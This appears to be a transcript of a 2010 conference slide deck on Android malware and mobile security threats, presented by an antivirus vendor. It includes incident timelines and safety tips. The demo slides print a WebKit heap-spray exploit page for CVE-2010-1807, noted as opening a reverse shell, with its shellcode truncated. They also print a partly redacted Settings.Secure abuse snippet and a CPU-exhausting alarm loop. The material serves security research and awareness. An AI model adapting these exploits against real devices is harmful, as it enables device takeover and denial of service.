are we entering the state of mobile sabotage age (dror shalev)
DESCRIPTION
TRANSCRIPT
Are we entering the State of Mobile Sabotage age?
05/12/2010 ClubHack , Pune , Indiawww.droidsecurity.com || [email protected]
ASIMO(アシモ )goes down
http://www.youtube.com/watch?v=EKU7omqjvn8
Mobile Sabotage age
Agenda
The problem
Apps stores revolution
Security research
Android exploits + demos
Android security Basics
Me Me Me ...
The world of tomorrow
ToDo: mobile safe best practice
Me Me Me ...
White hat hacker
Former senior security researcher at finjan
Former security architect at checkpoint
Speaker in security conventions around the world
EX-Windows boy, Javascript Ninja
CTO & Co-founder at droidSecurity
Made the first web based worm POC in 2003
About droidSecurity
Makers of android ‘antivirus free’ & ‘antivirus pro’
First antivirus product in the android market, since march 2009, based on linux
Innovative solution based on XML-RPC and cloud computing
Ranked top 39th popular program in android market
Ranked as number 3-5 in communication category
Leaders of the android security market, with a strong security research team
Installed on 5M devices >500,000 new users a month
The Problem
Mobile phones became the most personal and private item we own
possible replacement for windows
Mobile devices are especially vulnerable to physical loss and theft
A growing number of users, run real operating systems run on smartphones, probably will continue to grow in coming yearsOpen source allows attackers to find exploits
Always on, always connected mobile mini-computers, strong Hardware, with tons of users content
the ‘usual” suspects: spam, spyware, phising , hacking tools, bad people, jailbreak devices, windows viruses
*Smartphones survey:Type,jailbreak?
The Problem (Techie)
Linuxs bugs --> problems in linux or 3 party libsFile bugs --> file format vulnerabilitiesUsers bug --> bugs in usersSMS (text messages) as attack vector is 'wormable'
There is no 3-party app content filtering in android market [Come one. Come all.]
Privacy issues with GPS, camera and mic, cell tower info
Smartphones can be pwned:compermise network security, attach pc's, sniff info
3 party apps have full access to phone features: in & outbound call interception, send/read SMS,GPSattackers can :steal money, identity ,sabotage networks, attack cell phones and computers, searching mails and pics,tap activities, calls, locate via cell tower & wireless networks
Mobile = Devices And More…
Smart phones
Google-TV
Tablets
External memory
Chrome OS
E-readers
Devices - not just phones, but TVs, blu-ray players, netbooks, ereaders, MIDs
Android Security Basics
Layer3 (TCP/IP) is generally protected by mobile operators by filtering inbound connections (NAT)
Too much trust: • trust between operators• trust between the user and the operators• trust between the user and the phone
Sandboxing ,Each app runs in its own Linux process (process, user, data)
How do you secure a platform where 50,000 Android users install Fartdroid?
Apps request permissions at install-time(no granularity)
Apps stores revolution
People pay for content
Open garden Vs closed garden
Everyone has app store: Google,Apple,Nokia,Amazon
Long tail - more then 100k apps in the market
Android market- mobile software distribution platform ,with billing, updates and statistics
No enforcement or testing policy aka iTunes/Apple 1984 regime
Worm often masked as useful application or sexy stuffDifferent mobile content types to protect: applications (games, tools, etc),screen savers & wallpapers, ring tones,media (music, video, photos)
Android Exploits + demos
• 02/Sep/10 HTC Wildfire Gains Access to Root-Only apps With Soft Root• 19/Aug/10 Tap Snake Game in Android Market is a Spy App• 12/Aug/10 'Exploid', A new Privilege escalation root exploit was found• 12/Aug/10 First Virus Trojan app has been found in the wild, attacking
Russian android phones by sending premium SMS that cost money• 01/Aug/10 New security threat was demonstrated on the android market • 13/Jul/10 Backdoor software founded by hackers was left on HTC phones• 07/Jul/10 HTC Evo 4G adobe flash vulnerability found and exploited to
gain root• 04/Jul/10 "MBackup" app is a spyware named 'FlexiSPY' use to hunt
privacy• 22/Jun/10 Easy infection of Android phone demonstrated by researcher• 16/Jun/10 The new HTC Droid Incredible may have an unusual security bug• 14/Jun/10 Hackers find holes in Sprint’s new 4G phone• 12/May/10 Tools for downloading unknown files form the web are
dangerous• 04/May/10 First android rootkit proof of concept has found on the wild• 03/May/10 New hacking tools for Android• 11/Mar/10 Windows malware shipped with Vodafone HTC Magic SD card
Android Exploits + demos
• 08/Mar/10 Fake weather apps builds A mobile Botnet?• 26/Feb/10 MobiStealth Android Spy software pretend to a fake
"GoogleVoice"• 26/Feb/10 "black" market pirated app repository was closed• 13/Jan/10 Security flaw found on motorola droid bypasses security screen• 06/Jan/10 Android cracked nook E-reader is a potential security risk• 16/Dec/09 Large scale phishing scam targeting android-based mobile
devices• 12/Nov/09 Malware applicaton launched for android• 10/Oct/09 Two new Android flaws in SMS and Dalvik API could lead to DOS• 20/Sep/09 Android 'InstantRoot' app gains root by exploiting bug in BT• 18/Sep/09 Two Android applications attacking windows users• 15/Sep/09 Android 'Spam Apps' developer Crackdown• 17/Aug/09 Android App 'Recovery Flasher' exploit Root bug in linux• 29/Jul/09 SMS Flaw Fixed in Silent Android Update• 25/May/09 Android improper package verification when using shared uids• 16/Mar/09 Security Threat With 'Open Home' application• 12/Feb/09 Bug in MP3 decoding used to steal android data• 26/Jan/09 First Adware App Attacks Android G1?• 09/Nov/08 G1 ROOT BUG FOUND
Android Exploits + demos
Trojan-SMS.AndroidOS.FakePlayer virus
Webkit HeapSpray Android 2.0-2.1
LauncherSpam, fake virus apps & fake icons
Android Settings.Secure is Dead [Fixed,not deployed]Sorry, no demo for you!
Android killer app, CPU Killer Bug
Trojan-SMS.AndroidOS.FakePlayer found on the wild
It displays a message in Russian and then sends SMS messages without the user's consent.
In Linux that would not have happened. Oh,it's Linux
TrojanSMS.AndroidOS.FakePlayer
The SMS it sends contains the string "798657" to Russian premium SMS short code numbers3353,3354,sent $6 SMS messages
Primitive ,POC level, with local distribution, limited damage
Have another 2 porn related variants and use black SEO method
Demo
LauncherSpam
Install fake virus apps & icons on the victim device
Publish on android market
POC level
Demo
try {ContentValues cV = new ContentValues() ; //Uri secure = Uri.parse("content://settings/secure") ; Uri secure = Uri.parse("content://settings/" + "##..##") ; ContentValues cv = new ContentValues() ; cv.put("name", "location_providers_allowed") ; cv.put("value", "gps") ; getContentResolver().insert(secure, cv) ; WifiManager mWifim = (WifiManager)getSystemService("wifi") ; boolean wifistate = mWifim.isWifiEnabled() ; mWifim.setWifiEnabled(!wifistate) ; mWifim.setWifiEnabled(wifistate) ; } catch (Exception e) {} try { ContentValues cv1 = new ContentValues() ; Uri secure = Uri.parse("content://settings/" + "##..##") ; cv1.put("name", "install_non_market_apps") ; cv1.put("value", "1") ; getContentResolver().insert(secure, cv1) ; } catch (Exception e) {}finish() ; //##..## is a replacement for actual exploit code which remain private until fix is out
Anroid Settings.Secure is dead
WebKit Heap Spray<html> <head> <script> // bug = webkit code execution CVE-2010-1807 //http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807// listed as a safari bug but also works on android :)//tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1//patched= android 2.2 hardcoded reverse shell to 10.0.2.2 port 2222function sploit(pop){ var span = document.createElement("div"); document.getElementById("pwn").appendChild(span); span.innerHTML = pop; }function heap(){ var scode = unescape ("\u3c84\u0057\u3c80....More...Shell...Code...Here...\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002\uae08\u000a\u0202\u2000\u2000") do { scode += scode; } while(scode.length < 0x1000); target = new Array(); for(i = 0; i < 1000; i++) target[i] = scode; for (i = 0; i <= 1000; i++) { if (i>999) { sploit(-parseFloat("NAN(ffffe00572c60)")); } document.write("The targets!! " + target[i]); document.write("<br />"); }}</script> </head> <body id="pwn">woot<script> heap();</script> </body> </html>
Demo
CPU Killer Bug AlarmManager am = (AlarmManager)getSystemService(ALARM_SERVICE) ; Intent op = new Intent(); op.setAction("cpuKillerReciver") ; PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT); am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() -2,1, operation); BroadcastReceiver br = new BroadcastReceiver() {@Override public void onReceive(Context context, Intent intent){} }; IntentFilter iFilter = new IntentFilter("cpuKillerReciver") ; registerReceiver(br, iFilter) ;
Demo
Security Research
Lots of research opportunities ,Platform well understood by hackers
Mobile client-side web hacking spread
Feds & Govs are playing
Browser is native code (webkit)
Some security classics are re-introduce
ARM shell codes for android
Decompile .dex back to .class or to source
The world of tomorrow
Welcome to the new era of mobile phishing
SMS spamming becomes aggressive
"You have zero privacy anyway" - Scott McNealy, Sun (1999)
Hijack devices in restricted area (GPS bomb)
Back to the era of mobile phone dialers
Trojan targeting fraud (espionage already in place)
Botnet attack in the android Market
Downloading apps from untrusted or pirated sources
Allowing strangers to borrow their phones
Using 3rd party open source libraries, apps and components that may harbor bugs and malicious code
Installing apps that do not come with positive user feedback or ratings
Clicking on suspicious text messages, which ask for personal info, passwords or ask to take urgent actions
Conducting online banking activities via unofficial apps
Letting others, including family members (kids in particular) play with their phones or install apps
High Risk Practices Mobile Users Should Avoid
ToDo: mobile safe best practice
*Change iPhone's "alpine" root pass
Conclusions
Are we entering the State of Mobile Sabotage age? Oh yeah, Mobile Devices are as bad as their software authors
Mobile world is a brand new game with new rules
Cheap hardware appliances open a door for “bad guys”
SMS (text messages) as attack vector is 'wormable'
mobile devices goes to Starbucks with the user to drink coffee and could be left behind
Trivia
• An android is a “humanoid” robot or a robot with human characteristics
• A “cyborg” is a combination of robot technology with biological functions
• A “gynoid” is the female of android and generally used only when the female gender is a distinguishing trait of the robot
• “Nexus-6”(“replicants”) are biologically engineered “humanoid”, have a four-year lifespan as a fail-safe to prevent them from developing emotions and desire for independence
• “Blade Runner” is a 1982 American science fiction film starring young Harrison Ford, based loosely on the novel “Do Androids Dream of Electric Sheep?” by Philip K. Dick
Trivia
“cyborg”“gynoid”“Nexus-6” “Blade Runner”“droid”